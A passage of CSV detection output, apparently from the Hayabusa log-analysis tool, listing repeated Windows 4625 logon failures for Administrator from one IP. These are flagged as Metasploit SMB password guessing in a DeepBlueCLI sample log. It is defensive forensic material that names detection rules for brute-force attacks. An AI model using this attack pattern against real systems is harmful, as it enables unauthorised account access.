Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
